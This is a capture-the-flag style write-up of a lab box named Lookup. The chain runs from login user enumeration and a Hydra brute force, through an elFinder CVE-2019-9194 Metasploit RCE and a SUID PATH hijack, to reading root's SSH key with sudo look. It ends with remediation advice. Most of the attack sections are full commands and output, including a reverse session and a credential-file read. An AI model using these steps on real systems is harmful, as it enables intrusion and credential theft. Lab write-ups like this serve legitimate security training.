Login oracle, elFinder RCE, and sudo look key theft
Intermediate web engagement: Hydra against a login oracle found jose; elFinder CVE-2019-9194 yielded www-data; SUID pwm PATH hijack unlocked think; sudo look read root’s SSH private key.
- Case files
- Login oracle, elFinder RCE, and sudo look key theft
Differential login errors enabled username discovery. elFinder 2.1.47 on a files vhost accepted Metasploit RCE. pwm and sudo look moved from www-data to think to root via a stolen id_rsa.
Hydra found jose. Metasploit against files.lookup.thm/elFinder returned a www-data session.
Forged /tmp/id so pwm dumped think’s password list; Hydra recovered SSH credentials.
NOPASSWD look against /root/.ssh/id_rsa produced a key for root SSH.
Engagement summary
Differential login errors enabled username discovery. elFinder 2.1.47 on a files vhost accepted Metasploit RCE. pwm and sudo look moved from www-data to think to root via a stolen id_rsa.
LOOKUP (10.10.80.211 / lookup.thm) hosted a login that distinguished invalid users from invalid passwords. Hydra with a name list recovered jose:password123 and redirected us to files.lookup.thm running elFinder 2.1.47. We exploited CVE-2019-9194 (exiftran command injection in the PHP connector) via Metasploit for a www-data shell. SUID /usr/sbin/pwm invoked id from PATH then dumped think’s password file; forging id output and spraying the list yielded think:josemario.AKA(think) over SSH. sudo -l allowed /usr/bin/look, which GTFOBins-style read /root/.ssh/id_rsa for root SSH.
Business impact
User-enumeration oracles accelerate credential attacks. Unpatched elFinder is RCE on file-manager vhosts. SUID helpers that trust PATH and sudo look over sensitive files turn local access into root. Fix login messaging, patch or remove elFinder, rewrite pwm with absolute paths, and never grant look/read helpers against /root.
Login oracle and elFinder RCE
Hydra found jose. Metasploit against files.lookup.thm/elFinder returned a www-data session.
OPERATOR · HYDRA
savvy@lab:~$ echo '10.10.80.211 lookup.thm files.lookup.thm' | sudo tee -a /etc/hosts
savvy@lab:~$ hydra -L names.txt -p password123 lookup.thm http-post-form "/login.php:username=^USER^&password=^PASS^:F=try again"
[80][http-post-form] host: lookup.thm login: jose password: password123
OPERATOR · ELFINDER
savvy@lab:~$ msfconsole -q
msf6 > use exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection
msf6 > set RHOSTS files.lookup.thm
msf6 > set TARGETURI /elFinder/
msf6 > set LHOST tun0
msf6 > run
Meterpreter session opened
savvy@lab:/var/www$
SUID pwm PATH hijack to think
Forged /tmp/id so pwm dumped think’s password list; Hydra recovered SSH credentials.
OPERATOR · PWM
savvy@lab:~$ find / -perm /4000 2>/dev/null
/usr/sbin/pwm
savvy@lab:~$ printf '#!/bin/bash\necho "uid=33(think) gid=33(think) groups=33(think)"\n' > /tmp/id && chmod +x /tmp/id
savvy@lab:~$ export PATH=/tmp:$PATH && /usr/sbin/pwm
# dumps /home/think/.passwords
savvy@lab:~$ hydra -l think -P wordlist.txt ssh://lookup.thm
[22][ssh] login: think password: josemario.AKA(think)
savvy@lab:~$ ssh think@lookup.thm
savvy@lab:~$
sudo look to root SSH key
NOPASSWD look against /root/.ssh/id_rsa produced a key for root SSH.
OPERATOR · LOOK
savvy@lab:~$ sudo -l
(ALL) NOPASSWD: /usr/bin/look
savvy@lab:~$ sudo look '' /root/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
savvy@lab:~$ chmod 600 id_rsa && ssh -i id_rsa root@lookup.thm
root@lab:~# id
uid=0(root) gid=0(root) groups=0(root)
Remediation
Normalize login error messages. Patch elFinder past CVE-2019-9194 or remove it. Drop SUID from pwm; use absolute paths. Remove look from sudoers — use least-privilege file ACLs instead.